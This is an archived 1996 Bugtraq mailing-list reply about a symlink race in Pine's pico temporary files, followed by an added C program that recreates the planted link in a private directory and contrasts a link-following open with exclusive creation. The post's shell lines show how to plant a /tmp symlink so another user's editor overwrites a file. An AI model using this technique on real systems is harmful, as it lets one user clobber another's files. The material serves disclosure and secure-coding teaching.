Bugtraq mailing list archives
Re: [linux-security] Pine security problem
From: ranaur () rdc puc-rio br (Ranaur, the Elven Warlock!)
Date: Thu, 12 Sep 1996 22:09:59 -0300
On Thu, 12 Sep 1996, Pascal A. Dupuis wrote:
> I tried with my system, running Pine3.95 on Linux 2.0.18.
>
> A) I started composing a message, invoked the alternate editor (with Linux and a French keyboard, the command is ^), ??? ). From another login name, I do:
>
>   cd /tmp
>   ln -s pico.pid hacker.tmp
>   more hacker.tmp -> permission denied !
>
> B) I started the other way: first, from the other login
>
>   ln -s hacker.tmp pico.pid
>
> Then, start composing a message. Invoking the alternate command resulted in the error message: "Problem creating pico temp file", and I was unable to use the alternate editor.
>
> On the Linux system, the /tmp/pico.pid file is created 600, owned by the Pine user. At first glance, this should be safe, isn't it ?

No. I ran it on PINE 3.91 ... see on ... (sorry, I ran it as root ;)

root@galadriel:/tmp# ln -s t pico.238
root@galadriel:/tmp# touch t
root@galadriel:/tmp# chown 666 t
root@galadriel:/tmp# ls -l
lrwxrwxrwx 1 root root 1 Sep 12 22:00 pico.238 -> t*
-rw-rw-rw- 1 root root 0 Sep 12 22:01 t*

(ran pine (with ranaur) ... answering this message and ^_ to it ... ;)

so ... abracadabra ...

-rw-rw-rw- 1 root root 2366 Sep 12 22:06 t

Well ... it's a problem ... if the evil guy is smart enough he can check the root running pine and trash a file in the system ... (the odds are few, but, let me be paranoid ;) )

Any suggestions?

Ainur a Valar!
Ranaur

Ranaur, the Elven Warlock !
E-mail ranaur () rdc puc-rio br ranaur () usa net
Look! http://venus.rdc.puc-rio.br/ranaur/
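
The message above shows a draft being written through a pre-planted /tmp/pico.238 link. The following is an added example, not part of the original post and not Pine's own code: it reproduces that layout in a private scratch directory and compares a link-following open with exclusive creation. The names open_naive, open_exclusive and run_case are hypothetical.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the thread: open a predictable name, following any link. */
static int open_naive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* O_CREAT|O_EXCL fails with EEXIST if the name already exists, symlinks
   included (even dangling ones), so a planted link is never followed. */
static int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed scenario: "t" is the victim file, "pico.238" the planted link.
   Returns the victim's size after the draft is written, -1 if the opener
   refused the path with EEXIST, or a lower value on setup/other errors. */
long run_case(int exclusive) {
    char dir[] = "/tmp/symdemo.XXXXXX", victim[64], link_path[64];
    const char draft[] = "draft message body\n";
    struct stat st;
    long result = -1;
    if (!mkdtemp(dir)) return -2;
    snprintf(victim, sizeof victim, "%s/t", dir);
    snprintf(link_path, sizeof link_path, "%s/pico.238", dir);
    close(open(victim, O_WRONLY | O_CREAT, 0666));        /* touch t */
    if (symlink("t", link_path) != 0) return -2;          /* ln -s t pico.238 */
    int fd = exclusive ? open_exclusive(link_path) : open_naive(link_path);
    if (fd >= 0) {
        ssize_t n = write(fd, draft, sizeof draft - 1);
        close(fd);
        result = (n < 0 || stat(victim, &st) != 0) ? -3 : (long)st.st_size;
    } else if (errno != EEXIST) {
        result = -3;
    }
    unlink(link_path); unlink(victim); rmdir(dir);
    return result;
}

int main(void) {
    printf("naive open:     victim size %ld\n", run_case(0));
    printf("exclusive open: %ld (-1 means refused)\n", run_case(1));
    return 0;
}
```

mkstemp() applies the same exclusive creation and also picks an unpredictable name, which removes the need to guess-proof a pid-based filename.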